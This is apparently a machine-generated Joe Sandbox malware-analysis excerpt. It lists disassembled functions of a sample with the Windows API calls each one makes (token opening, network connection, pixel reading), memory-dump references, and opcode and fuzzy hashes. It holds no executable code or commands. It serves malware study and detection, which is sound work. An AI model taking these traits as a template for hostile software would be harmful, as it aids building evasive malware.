                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                            • String ID:
                                            • API String ID: 2710830443-0
                                            • Opcode ID: 4caefdb3a2eb5ee4cfff01b8828168da2bd12341909175144d7b1bc9d4abe674
                                            • Instruction ID: a4d616ae3321a3a7947b2c1be3718e83bc66080fc401da3c7a9e131e00a74b07
                                            • Opcode Fuzzy Hash: 4caefdb3a2eb5ee4cfff01b8828168da2bd12341909175144d7b1bc9d4abe674
                                            • Instruction Fuzzy Hash: 25E0A572985328BADB205FA2EC0DEDB7E5CEF167A1F048036F609E5061C671C5449BE1
                                            Function 00E12218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSysColor.USER32(00000008), ref: 00E12231
                                            • SetTextColor.GDI32(?,000000FF), ref: 00E1223B
                                            • SetBkMode.GDI32(?,00000001), ref: 00E12250
                                            • GetStockObject.GDI32(00000005), ref: 00E12258
                                            • GetWindowDC.USER32(?,00000000), ref: 00E4C0D3
                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E4C0E0
                                            • GetPixel.GDI32(00000000,?,00000000), ref: 00E4C0F9
                                            • GetPixel.GDI32(00000000,00000000,?), ref: 00E4C112
                                            • GetPixel.GDI32(00000000,?,?), ref: 00E4C132
                                            • ReleaseDC.USER32(?,00000000), ref: 00E4C13D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                            • String ID:
                                            • API String ID: 1946975507-0
                                            • Opcode ID: 0e755556f8558f8ed3ed523112956c5c711809229f49e8894efc864ab4229d88
                                            • Instruction ID: 5d3a52ea79b525e3f807e6bbbc17e41e24689404233407aad5fd35afaa1f2a30
                                            • Opcode Fuzzy Hash: 0e755556f8558f8ed3ed523112956c5c711809229f49e8894efc864ab4229d88
                                            • Instruction Fuzzy Hash: F9E06D32201244EEDB215FA6FC0D7D83B20EB05336F10836BFA69A80F287714994DB52
                                            Function 00E68C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentThread.KERNEL32 ref: 00E68C63
                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E6882E), ref: 00E68C6A
                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E6882E), ref: 00E68C77
                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E6882E), ref: 00E68C7E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CurrentOpenProcessThreadToken
                                            • String ID:
                                            • API String ID: 3974789173-0
                                            • Opcode ID: fb713ed2404e8bb480a360b495b868e026f78cdb1b68e9d7f1b99a6161bd4526
                                            • Instruction ID: cf4fd24b51df05da5e2ecbcb7170891f25e660621593ede6467db92b0704c818
                                            • Opcode Fuzzy Hash: fb713ed2404e8bb480a360b495b868e026f78cdb1b68e9d7f1b99a6161bd4526
                                            • Instruction Fuzzy Hash: 6FE02672642210DFD7205FB26E0CB463BACEF507E2F05482AF645F9080DA348449CB21
                                            Function 00E52187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDesktopWindow.USER32 ref: 00E52187
                                            • GetDC.USER32(00000000), ref: 00E52191
                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E521B1
                                            • ReleaseDC.USER32(?), ref: 00E521D2
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CapsDesktopDeviceReleaseWindow
                                            • String ID:
                                            • API String ID: 2889604237-0
                                            • Opcode ID: 9047b0e80b628635c929b8d6021c6f953506ba02e9ff650629558f62147676d0
                                            • Instruction ID: c204b116e784f2fac6230b47a8db5e2d905506aea66588443b16a3898d5f278a
                                            • Opcode Fuzzy Hash: 9047b0e80b628635c929b8d6021c6f953506ba02e9ff650629558f62147676d0
                                            • Instruction Fuzzy Hash: AFE0C275840704AFDB019F61C808A9D7BA5AB48351F20842BE95AE6261CB7881859F80
                                            Function 00E5219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDesktopWindow.USER32 ref: 00E5219B
                                            • GetDC.USER32(00000000), ref: 00E521A5
                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E521B1
                                            • ReleaseDC.USER32(?), ref: 00E521D2
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CapsDesktopDeviceReleaseWindow
                                            • String ID:
                                            • API String ID: 2889604237-0
                                            • Opcode ID: fdd1c8020d1e592ffd57fcfe105618b8190dc519939b16b8e0e6247ac1c2393a
                                            • Instruction ID: 944c5d437ed5b8faddf84b6b75f9ef427ad4ea52477cd3632fab5b20196d9b17
                                            • Opcode Fuzzy Hash: fdd1c8020d1e592ffd57fcfe105618b8190dc519939b16b8e0e6247ac1c2393a
                                            • Instruction Fuzzy Hash: D9E0E575800304AFCB019F71C80869D7BE5AB4C310F208427F95AE7261CB7891859F80
                                            Function 00E163A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %
                                            • API String ID: 0-2291192146
                                            • Opcode ID: 3b26ae1052a504e60f30bb40de8f60c90caf7eda111f848ac51dc335c580c6c8
                                            • Instruction ID: 98880b1c1e6e69582146488485f742ac96feb08aab4bf12e87245e4b96b6e927
                                            • Opcode Fuzzy Hash: 3b26ae1052a504e60f30bb40de8f60c90caf7eda111f848ac51dc335c580c6c8
                                            • Instruction Fuzzy Hash: 88B1A0719042099BCF24EF98C8819FEBBB5FF44310F546426E952B7295EB309EC2CB91
                                            Function 00E8B1B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __itow_s
                                            • String ID: xr$xr
                                            • API String ID: 3653519197-2528877900
                                            • Opcode ID: 2a99f1dba166adc7d891d96bd2f9e0f61bcfd9fd1e503501bef816da1163c7d7
                                            • Instruction ID: 58f9f5625ece7a306f1ca7b2f216a72da42d41c7ed81f44fa2fa5599502c1c6b
                                            • Opcode Fuzzy Hash: 2a99f1dba166adc7d891d96bd2f9e0f61bcfd9fd1e503501bef816da1163c7d7
                                            • Instruction Fuzzy Hash: 0AB16E70A04209ABDB14EF54C891DEEB7FAFF58304F149459F94DAB252EB70E981CB50
                                            Function 00E7B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E2FEC6: _wcscpy.LIBCMT ref: 00E2FEE9
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            • __wcsnicmp.LIBCMT ref: 00E7B298
                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E7B361
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                            • String ID: LPT
                                            • API String ID: 3222508074-1350329615
                                            • Opcode ID: 8ba11db64bbf6c05af1fd56521ad1ecc6ed9b299e1bb41448de8db2e9ac0abf1
                                            • Instruction ID: 0c1cf83deee2644896b3151a321971a4aac39aac60415ca0d6162dc2bd88992d
                                            • Opcode Fuzzy Hash: 8ba11db64bbf6c05af1fd56521ad1ecc6ed9b299e1bb41448de8db2e9ac0abf1
                                            • Instruction Fuzzy Hash: A0615D75A00215AFCB14DF94C895FEEB7F4AF48314F15906AF94ABB291DB70AE80CB50
                                            Function 00E58A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID: Oa
                                            • API String ID: 4104443479-3945284152
                                            • Opcode ID: 769f79d3d460f16f7aae80f6ce9a1feb3a660d7176c99efbb24825c101979b8f
                                            • Instruction ID: 45e6abcb6f5a4531088cb7f1d3a2cbd8cdda59004be6de8f7f6efee98adff000
                                            • Opcode Fuzzy Hash: 769f79d3d460f16f7aae80f6ce9a1feb3a660d7176c99efbb24825c101979b8f
                                            • Instruction Fuzzy Hash: 9551A1B0A00619DFCF64CF68C580AAEBBF5FF44309F10592AE85AF7250DB30A959CB51
                                            Function 00E22AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNEL32(00000000), ref: 00E22AC8
                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E22AE1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: GlobalMemorySleepStatus
                                            • String ID: @
                                            • API String ID: 2783356886-2766056989
                                            • Opcode ID: c9983cf8ddd66f349b5291a518ee8f3d1b8d43646a49b56a08c7cf8a22f36eba
                                            • Instruction ID: 5a1479e3bdc42c9eec7c84a30bd69d351c4e3643bcc7381085e901b5310a594c
                                            • Opcode Fuzzy Hash: c9983cf8ddd66f349b5291a518ee8f3d1b8d43646a49b56a08c7cf8a22f36eba
                                            • Instruction Fuzzy Hash: 625148724187449BD320AF11D896BAFBBE8FF84310F42485DF2D9611A2DB31896DCB56
                                            Function 00E799BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E1506B: __fread_nolock.LIBCMT ref: 00E15089
                                            • _wcscmp.LIBCMT ref: 00E79AAE
                                            • _wcscmp.LIBCMT ref: 00E79AC1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _wcscmp$__fread_nolock
                                            • String ID: FILE
                                            • API String ID: 4029003684-3121273764
                                            • Opcode ID: dca68170bb1334fe5920804d9a2ca7c82b72f6553d8e7f930c8bf685afceb02a
                                            • Instruction ID: 346f9fa421f35adc15af62fa2b435bd6b7086e20c4cc16a6c4788dbd4fe7f146
                                            • Opcode Fuzzy Hash: dca68170bb1334fe5920804d9a2ca7c82b72f6553d8e7f930c8bf685afceb02a
                                            • Instruction Fuzzy Hash: 2E41D872A00609BADF209AA4DC46FEFBBFDDF49714F00507AB904B7181D675AA44C7A1
                                            Function 00E5099E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClearVariant
                                            • String ID: Dt$Dt
                                            • API String ID: 1473721057-4168040075
                                            • Opcode ID: 92fe659ad00ab9839354764fe4093171677251ed623d626d59c0ad9d2c415714
                                            • Instruction ID: 0928df9ddcd881a150fb595b48391a6fa07c295d4a45acb62f9491d47aa552c2
                                            • Opcode Fuzzy Hash: 92fe659ad00ab9839354764fe4093171677251ed623d626d59c0ad9d2c415714
                                            • Instruction Fuzzy Hash: 2F51F8746093418FC754CF19C18066ABBE1FF99358F58686DF895AB321E331EC85CB42
                                            Function 00E82882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E82892
                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E828C8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CrackInternet_memset
                                            • String ID: |
                                            • API String ID: 1413715105-2343686810
                                            • Opcode ID: 9092036fee0740f5e5f9915c5cc4d7174b8e7c108eb8ec620d86afe1523c427c
                                            • Instruction ID: 2c96e13978e3b6d6343deab97c1500fc3cb231bf4b4918d0935ffb3b4cc6e106
                                            • Opcode Fuzzy Hash: 9092036fee0740f5e5f9915c5cc4d7174b8e7c108eb8ec620d86afe1523c427c
                                            • Instruction Fuzzy Hash: 58311971800119AFCF05AFA1CC85EEEBFB9FF08300F105029F959B6166DB315A96DBA0
                                            Function 00E96CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                            Download Yara Rule
                                            APIs
                                            • DestroyWindow.USER32(?,?,?,?), ref: 00E96D86
                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E96DC2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$DestroyMove
                                            • String ID: static
                                            • API String ID: 2139405536-2160076837
                                            • Opcode ID: 873ab69045011b88bf48e5e3534a6e6cbeabe8fe8d5ef7e68713faed92e751a2
                                            • Instruction ID: ae43cc89fdb06fb4e4935de54241c91630d9a81a22df0f89f7d165ab00c266ec
                                            • Opcode Fuzzy Hash: 873ab69045011b88bf48e5e3534a6e6cbeabe8fe8d5ef7e68713faed92e751a2
                                            • Instruction Fuzzy Hash: 8031A171210604AEDF109F64DC40AFB73B9FF48724F10A51AF9A5E7190CB31AC95CB60
                                            Function 00E72D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E72E00
                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E72E3B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: InfoItemMenu_memset
                                            • String ID: 0
                                            • API String ID: 2223754486-4108050209
                                            • Opcode ID: 53603087c842768d16e1df0fd3d57330ecbe6689c4dce945d1ecbec841f60c1c
                                            • Instruction ID: 38c1aa78cc8fa7df548531fd3a287bc1a0d81fc2042af513daf593c5d0ba88a6
                                            • Opcode Fuzzy Hash: 53603087c842768d16e1df0fd3d57330ecbe6689c4dce945d1ecbec841f60c1c
                                            • Instruction Fuzzy Hash: A431F531A00305ABEB268F58C845BAEBBF9EF05344F14A02EEAC9B61A0D7709944CB11
                                            Function 00E96943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E969D0
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E969DB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: Combobox
                                            • API String ID: 3850602802-2096851135
                                            • Opcode ID: b29e91c43af39bddf36735976958b95771aea3a7c4630c54960642100cb6cac4
                                            • Instruction ID: 85660a77dc7cf920be27c2fab180aa9a9120e892f73e49f80854c6025e098ac2
                                            • Opcode Fuzzy Hash: b29e91c43af39bddf36735976958b95771aea3a7c4630c54960642100cb6cac4
                                            • Instruction Fuzzy Hash: EE11B2716002086FEF119E24DC90EEB37AAEB893A8F111126F958BB290D6719C9187A0
                                            Function 00E96E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E11D73
                                              • Part of subcall function 00E11D35: GetStockObject.GDI32(00000011), ref: 00E11D87
                                              • Part of subcall function 00E11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E11D91
                                            • GetWindowRect.USER32(00000000,?), ref: 00E96EE0
                                            • GetSysColor.USER32(00000012), ref: 00E96EFA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                            • String ID: static
                                            • API String ID: 1983116058-2160076837
                                            • Opcode ID: 5bca64685bc640a221e3840cc411793e66f2b2d4a77edc48ba1ab907ed1f1f58
                                            • Instruction ID: ae2ddbded5bc8d9130bd4ede6824fbfa44435e9ba22920abbe7ce53282002c1a
                                            • Opcode Fuzzy Hash: 5bca64685bc640a221e3840cc411793e66f2b2d4a77edc48ba1ab907ed1f1f58
                                            • Instruction Fuzzy Hash: 3F212972610209AFDF04DFA8DD45AEA7BB8FB08314F05562AF955E3250D734E8619B50
                                            Function 00E96B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                            Download Yara Rule
